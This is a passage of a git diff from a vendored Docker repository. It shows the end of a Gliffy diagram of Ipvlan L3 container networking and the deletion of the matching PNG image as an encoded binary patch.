ight":16.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":16,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":28.93295288085936,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":17,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":290,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[217.5,167.06704711914062],[219.11774189711457,53.02855906766992]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":57.51435447730654,"y":10.461511948529278,"rotation":0.0,"id":246,"width":343.20677483961606,"height":143.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":18,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":55.19999694824217,"rotation":0.0,"id":262,"width":262.0,"height":75.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":22,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":nul
l,"html":"

Unless notified about the container networks, the physical network does not have a route to their subnets

Who has 10.16.20.0/24?

Who has 10.1.20.0/24?

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.0,"y":403.5,"rotation":0.0,"id":282,"width":442.0,"height":18.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers can be on different subnets and reach each other

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":252.5,"rotation":0.0,"id":288,"width":238.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Ipvlan L3 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":172.0,"rotation":0.0,"id":290,"width":207.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":3.568965517241383,"y":0.0,"rotation":0.0,"id":291,"width":199.86206896551747,"height":42.0,"uid":null,"order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Eth0

192.168.50.10/24

Parent interface acts as a Router

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":29.0,"y":358.1999969482422,"rotation":0.0,"id":304,"width":390.99999999999994,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

All containers can ping each other without a router if

they share the same parent interface (example eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":24.0,"y":276.0,"rotation":0.0,"id":320,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":48,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":316,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":317,"width":109.44000000000001,"height":43.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 

172.16.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":318,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":319,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":300.0,"y":276.0,"rotation":0.0,"id":321,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":49,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":272,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":273,"width":109.44000000000001,"height":44.0,"uid":null,"orde
r":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":310,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":312,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":85.93295288085938,"rotation":0.0,"id":322,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":50,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#434343","fillColor":"none","dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-191.0,222.06704711914062],[-80.9272967534639,222.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.0,"y":25.499999999999986,"rotation":0.0,"id":323,"width":135.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":51,"lockAspec
tRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Physical Network

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":53}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#434343","strokeWidth":2,"dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"orthoMode":2}},"textStyles":{"global":{"face":"Arial","size":"13px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117032939,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png deleted file mode 100644 index 3227a83ca1541ec68e06b0aa105e22fdf5ae9e6f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 18260 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 